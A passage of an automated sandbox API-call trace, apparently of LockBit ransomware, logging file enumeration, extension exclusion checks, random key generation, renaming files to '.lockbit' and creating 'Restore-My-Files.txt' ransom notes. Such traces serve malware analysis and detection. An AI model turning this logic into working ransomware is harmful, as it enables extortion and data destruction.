wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.321] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.321] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x107d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0148757.JPG", cAlternateFileName="")) returned 1 [0144.321] lstrcmpiW (lpString1=".", lpString2="J0148757.JPG") returned -1 [0144.321] lstrcmpiW (lpString1="..", lpString2="J0148757.JPG") returned -1 [0144.321] PathFindExtensionW (pszPath="J0148757.JPG") returned=".JPG" [0144.321] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0144.321] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0144.321] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0144.321] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0144.321] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0144.321] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0144.321] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0144.321] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0144.321] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0144.321] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0144.321] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0144.321] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0144.321] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0144.321] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0144.322] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0144.322] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0144.322] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0144.322] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0144.322] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.322] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0144.322] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0144.322] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0144.322] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0144.323] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0144.323] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0144.323] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0144.323] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.323] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0144.323] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0148757.JPG") returned 1 [0144.323] lstrcmpiW (lpString1="ntldr", lpString2="J0148757.JPG") returned 1 [0144.323] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0148757.JPG") returned 1 [0144.323] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0148757.JPG") returned -1 [0144.323] lstrcmpiW (lpString1="autorun.inf", lpString2="J0148757.JPG") returned -1 [0144.323] lstrcmpiW (lpString1="thumbs.db", lpString2="J0148757.JPG") returned 1 [0144.323] lstrcmpiW (lpString1="iconcache.db", lpString2="J0148757.JPG") returned -1 [0144.323] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.323] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned=".JPG" [0144.323] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0144.323] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0144.324] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0144.324] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0144.325] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG.lockbit") returned 72 [0144.325] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.326] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.326] malloc (_Size=0x40068) returned 0x3df0008 [0144.326] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=67540) returned 1 [0144.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.327] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.332] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.332] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.332] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.335] free (_Block=0x1fa2ed8) [0144.335] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.335] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.335] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.335] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f27470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x955d, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0148798.JPG", cAlternateFileName="")) returned 1 [0144.335] lstrcmpiW (lpString1=".", lpString2="J0148798.JPG") returned -1 [0144.335] lstrcmpiW (lpString1="..", lpString2="J0148798.JPG") returned -1 [0144.335] PathFindExtensionW (pszPath="J0148798.JPG") returned=".JPG" [0144.335] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0144.335] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0144.335] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0144.335] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0144.335] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0144.335] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0144.335] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0144.335] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0144.335] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0144.335] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0144.335] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0144.335] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0144.336] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.336] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0144.337] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0144.337] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0144.337] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0148798.JPG") returned 1 [0144.337] lstrcmpiW (lpString1="ntldr", lpString2="J0148798.JPG") returned 1 [0144.337] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0148798.JPG") returned 1 [0144.337] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0148798.JPG") returned -1 [0144.337] lstrcmpiW (lpString1="autorun.inf", lpString2="J0148798.JPG") returned -1 [0144.337] lstrcmpiW (lpString1="thumbs.db", lpString2="J0148798.JPG") returned 1 [0144.337] lstrcmpiW (lpString1="iconcache.db", lpString2="J0148798.JPG") returned -1 [0144.337] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.337] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned=".JPG" [0144.337] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0144.337] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0144.337] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0144.337] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0144.337] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0144.338] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0144.338] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG.lockbit") returned 72 [0144.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.339] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.339] malloc (_Size=0x40068) returned 0x3df0008 [0144.339] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=38237) returned 1 [0144.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.340] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.345] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.345] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.348] free (_Block=0x1fa2ed8) [0144.348] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.348] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.348] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.348] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6b01, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0149018.JPG", cAlternateFileName="")) returned 1 [0144.348] lstrcmpiW (lpString1=".", lpString2="J0149018.JPG") returned -1 [0144.348] lstrcmpiW (lpString1="..", lpString2="J0149018.JPG") returned -1 [0144.348] PathFindExtensionW (pszPath="J0149018.JPG") returned=".JPG" [0144.348] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0144.348] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0144.348] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0144.348] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0144.348] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0144.348] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0144.348] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0144.348] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0144.348] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0144.348] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0144.348] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0144.348] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0144.348] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0144.348] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0144.348] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0144.348] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0144.349] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.349] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0144.350] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0144.350] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0144.350] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0149018.JPG") returned 1 [0144.350] lstrcmpiW (lpString1="ntldr", lpString2="J0149018.JPG") returned 1 [0144.350] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0149018.JPG") returned 1 [0144.350] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0149018.JPG") returned -1 [0144.350] lstrcmpiW (lpString1="autorun.inf", lpString2="J0149018.JPG") returned -1 [0144.350] lstrcmpiW (lpString1="thumbs.db", lpString2="J0149018.JPG") returned 1 [0144.350] lstrcmpiW (lpString1="iconcache.db", lpString2="J0149018.JPG") returned -1 [0144.350] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.350] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned=".JPG" [0144.350] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0144.350] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0144.350] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0144.350] 